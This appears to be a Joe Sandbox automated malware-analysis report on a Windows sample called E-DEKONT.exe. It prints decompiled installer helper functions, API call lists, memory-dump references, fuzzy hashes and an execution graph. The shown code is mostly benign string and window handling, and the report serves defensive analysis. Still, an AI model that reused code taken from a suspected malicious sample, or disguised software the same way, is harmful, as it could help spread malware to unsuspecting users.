                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: C:\
                                                                            • API String ID: 3213498283-3404278061
                                                                            • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                            • Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
                                                                            • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                            • Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 58%
                                                                            			E00405B53(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                            0x00405b54
                                                                            0x00405b61
                                                                            0x00405b62
                                                                            0x00405b6d
                                                                            0x00405b75
                                                                            0x00405b75
                                                                            0x00405b7d

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3355392842
                                                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x422a00; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434ef0;
						if(_t2 >  *0x434ef0) {
							_t3 = CreateDialogParamW( *0x434ee0, 0x6f, 0, E00402DD7, 0);
							 *0x422a00 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406698(0);
					}
				} else {
					_t6 =  *0x422a00; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x422a00 = 0;
					return _t6;
				}
			}






                                                                            0x00402e64
                                                                            0x00402e7e
                                                                            0x00402e84
                                                                            0x00402e8e
                                                                            0x00402e94
                                                                            0x00402e9a
                                                                            0x00402eab
                                                                            0x00402eb4
                                                                            0x00000000
                                                                            0x00402eb9
                                                                            0x00402ec0
                                                                            0x00402e86
                                                                            0x00402e8d
                                                                            0x00402e8d
                                                                            0x00402e66
                                                                            0x00402e66
                                                                            0x00402e6d
                                                                            0x00402e70
                                                                            0x00402e70
                                                                            0x00402e76
                                                                            0x00402e7d
                                                                            0x00402e7d

                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                            • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                                            • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                            • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004038FB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b20c;
				_t3 = E004038E0(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b20c =  *0x42b20c & 0x00000000;
				return _t3;
			}







                                                                            0x004038fc
                                                                            0x00403904
                                                                            0x0040390b
                                                                            0x0040390e
                                                                            0x0040390e
                                                                            0x00403910
                                                                            0x00403915
                                                                            0x0040391c
                                                                            0x00403922
                                                                            0x00403926
                                                                            0x00403927
                                                                            0x0040392f

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75F63420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                                            • GlobalFree.KERNEL32(?), ref: 0040391C
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3355392842
                                                                            • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                            • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                                            • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                            • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00405B9F(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                            0x00405ba0
                                                                            0x00405baa
                                                                            0x00405bad
                                                                            0x00405bb3
                                                                            0x00405bb4
                                                                            0x00405bb5
                                                                            0x00405bbd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405bbd
                                                                            0x00405bbf
                                                                            0x00405bc7

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\E-DEKONT.exe,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\E-DEKONT.exe,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3370423016
                                                                            • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                                            • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}





















                                                                            0x100010e6
                                                                            0x100010f0
                                                                            0x100010ff
                                                                            0x1000110e
                                                                            0x10001119
                                                                            0x1000111c
                                                                            0x1000112b
                                                                            0x1000112f
                                                                            0x10001131
                                                                            0x100011d8
                                                                            0x100011de
                                                                            0x10001137
                                                                            0x10001138
                                                                            0x10001138
                                                                            0x1000113d
                                                                            0x1000113e
                                                                            0x10001140
                                                                            0x10001143
                                                                            0x1000120d
                                                                            0x10001210
                                                                            0x100011b0
                                                                            0x100011b6
                                                                            0x100011bf
                                                                            0x100011c4
                                                                            0x100011c7
                                                                            0x00000000
                                                                            0x100011c7
                                                                            0x10001212
                                                                            0x10001214
                                                                            0x10001196
                                                                            0x1000119d
                                                                            0x100011a5
                                                                            0x00000000
                                                                            0x100011a5
                                                                            0x10001161
                                                                            0x10001162
                                                                            0x1000116a
                                                                            0x10001177
                                                                            0x1000117f
                                                                            0x10001188
                                                                            0x1000118d
                                                                            0x1000118d
                                                                            0x00000000
                                                                            0x10001162
                                                                            0x10001149
                                                                            0x100011df
                                                                            0x100011df
                                                                            0x100011e6
                                                                            0x100011f3
                                                                            0x100011f8
                                                                            0x100011fb
                                                                            0x10001203
                                                                            0x10001205
                                                                            0x10001205
                                                                            0x00000000
                                                                            0x100011e6
                                                                            0x1000114f
                                                                            0x10001152
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001158
                                                                            0x1000115b
                                                                            0x100011ac
                                                                            0x00000000
                                                                            0x100011ac
                                                                            0x1000115d
                                                                            0x1000115f
                                                                            0x10001192
                                                                            0x00000000
                                                                            0x10001192
                                                                            0x00000000
                                                                            0x100011c9
                                                                            0x100011c9
                                                                            0x100011d3
                                                                            0x00000000
                                                                            0x100011d7

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405CD9(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                            0x00405ce9
                                                                            0x00405ceb
                                                                            0x00405cee
                                                                            0x00405d1a
                                                                            0x00405cf3
                                                                            0x00405cfc
                                                                            0x00405d01
                                                                            0x00405d0c
                                                                            0x00405d0f
                                                                            0x00405d2b
                                                                            0x00405d11
                                                                            0x00405d18
                                                                            0x00000000
                                                                            0x00405d18
                                                                            0x00405d24
                                                                            0x00405d28
                                                                            0x00405d28
                                                                            0x00405d22
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                                            • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:1.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:2
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 160 168510a TerminateThread 161 168511c 160->161

                                                                            Callgraph

                                                                            Executed Functions

                                                                            Function 0168510A Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.108990617739.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1660000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: TerminateThread
                                                                            • String ID:
                                                                            • API String ID: 1852365436-0
                                                                            • Opcode ID: 6e9ecfd13b23db6035c263e93c4e91c8ec5796bfbbecec56630a767907b33f47
                                                                            • Instruction ID: f227de6951d659e59097eda81288b02e0cc89060e775c8884e6b39de126de7b4
                                                                            • Opcode Fuzzy Hash: 6e9ecfd13b23db6035c263e93c4e91c8ec5796bfbbecec56630a767907b33f47
                                                                            • Instruction Fuzzy Hash: 792104252057828BEF356F389CA07DA27A2AF533A0F5D826D9CC65B2C5C3398547C71B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%